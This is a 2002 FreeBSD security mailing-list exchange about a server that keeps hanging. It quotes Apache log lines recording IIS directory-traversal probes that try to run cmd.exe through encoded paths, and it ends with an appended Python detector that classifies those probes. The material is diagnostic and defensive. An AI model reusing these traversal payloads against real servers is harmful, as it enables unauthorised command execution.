Date: Sat, 26 Jan 2002 11:20:45 -0600
From: "Chad Bishop" <cbishop@conwaycorp.net>
To: <security@freebsd.org>
Subject: Re: weird server activity
Message-ID: <000c01c1a68d$ca50d860$191a9018@win2ks>
References: <F31rfFz82buW5RNB6Hf00001c34@hotmail.com>
Do you have any crontabs? How much RAM and CPU clock does this machine have? Have you noticed any evidence of an intrusion?

----- Original Message -----
From: "William J. Borskey" <wborskey@hotmail.com>
To: <freebsd-security@freebsd.org>
Sent: Saturday, January 26, 2002 11:13 AM
Subject: weird server activity

> I am running FreeBSD 4.4. I use Apache-fp and openssh. About a week ago my
> system went down and I wasn't able to log in or look at any web pages. I
> could connect, but it would not spawn a process to log me in, or serve me a
> web document. I got someone to reboot the machine from the console, I was
> then able to log into the machine. Starting processes was slow but top
> reports normal system loads. Then after about an hour the machine would no
> longer run any processes and quickly shut me out by killing the sshd I was
> connected with. I did get a chance to look at some of my logs, not all
> unfortunately. The httpd-access file had some weird sequences of
> Windows-sounding paths, but it wasn't Code Red or anything like Code Red:
>
> 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET
> "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
> 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
> 147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
>
> I haven't been able to look at any other logs and I doubt that that has
> anything to do with it.
>
> William Borskey

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
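As an added example (not part of the thread), here is a small Apache access-log classifier that tags the kind of IIS probes quoted above by their encoding trick: direct requests for root.exe, double-URL-encoded traversal (%255c), overlong UTF-8 separators (%c0%af, %c1%9c), and the malformed %%35%63 requests that Apache answered with 400. Four of the sample lines are copied from the quoted log; the benign 10.0.0.5 request is constructed.

```python
import re
from urllib.parse import unquote

# Apache common/combined log line; the trailing "-" "-" referer/agent fields are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Overlong/malformed UTF-8 byte pairs (%c0%af, %c0%2f, %c1%9c, %c1%1c) seen in the quoted log.
OVERLONG_SEP = re.compile(r'%c0%(af|2f)|%c1%(9c|1c)', re.IGNORECASE)
TARGET_BIN = re.compile(r'(cmd|root)\.exe', re.IGNORECASE)

def classify(line):
    """Return (ip, status, tag) for a cmd.exe/root.exe probe, or None for any other request."""
    m = LOG_RE.match(line)
    raw = m.group('path') if m else ''
    once, twice = unquote(raw), unquote(unquote(raw))   # decode once and twice
    if not m or not TARGET_BIN.search(twice):
        return None
    if OVERLONG_SEP.search(raw):
        tag = 'overlong-utf8-traversal'
    elif once != twice and ('..\\' in twice or '../' in twice):
        tag = 'double-encoded-traversal'    # %255c -> %5c -> backslash only on the 2nd decode
    elif '..' in once:
        tag = 'plain-traversal'
    else:
        tag = 'direct-probe'                # e.g. /scripts/root.exe?/c+dir
    return (m.group('ip'), int(m.group('status')), tag)

def summarize(lines):
    """Count probe tags per source IP; a 400 means the server refused to parse the request."""
    out = {}
    for line in lines:
        hit = classify(line)
        if hit:
            ip, status, tag = hit
            key = 'malformed-rejected' if status == 400 else tag
            out.setdefault(ip, {})[key] = out.get(ip, {}).get(key, 0) + 1
    return out

# Four lines copied from the log quoted in the thread plus one constructed benign request.
SAMPLE = [
    '147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200',
    '147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"',
    '147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200',
    '147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291',
    '10.0.0.5 - - [19/Jan/2002:15:20:00 -0600] "GET /index.html HTTP/1.0" 200 1234',  # constructed
]
```

`summarize(SAMPLE)` yields one entry for 147.46.54.38 with one hit each of direct-probe, double-encoded-traversal, overlong-utf8-traversal and malformed-rejected; every probe drew a 404 or 400 from Apache, which is consistent with the poster's view that this scan is unrelated to the hang.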